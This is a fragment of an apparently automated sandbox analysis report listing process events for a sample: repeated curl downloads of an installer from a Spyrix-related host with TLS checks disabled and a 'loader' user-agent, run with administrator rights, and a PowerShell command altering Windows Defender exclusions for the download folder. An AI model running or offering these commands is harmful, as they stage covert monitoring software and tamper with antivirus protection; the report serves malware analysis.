                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:17
                            Start time:01:17:45
                            Start date:02/10/2024
                            Path:C:\Windows\System32\curl.exe
                            Wow64 process (32bit):false
                            Commandline:curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
                            Imagebase:0x7ff6c9e80000
                            File size:530'944 bytes
                            MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:18
                            Start time:01:17:45
                            Start date:02/10/2024
                            Path:C:\Windows\System32\timeout.exe
                            Wow64 process (32bit):false
                            Commandline:timeout 10
                            Imagebase:0x7ff6cf7b0000
                            File size:32'768 bytes
                            MD5 hash:100065E21CFBBDE57CBA2838921F84D6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:19
                            Start time:01:17:55
                            Start date:02/10/2024
                            Path:C:\Windows\System32\curl.exe
                            Wow64 process (32bit):false
                            Commandline:curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user~1\AppData\Local\Temp\s14\" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe
                            Imagebase:0x7ff6c9e80000
                            File size:530'944 bytes
                            MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:moderate
                            Has exited:true

                            Target ID:20
                            Start time:01:17:55
                            Start date:02/10/2024
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:powershell.exe Remove-MpPreference -exclusionPath "'C:\Users\user~1\AppData\Local\Temp\s14'"
                            Imagebase:0x7ff741d30000
                            File size:452'608 bytes
                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high
                            Has exited:true

                            No disassembly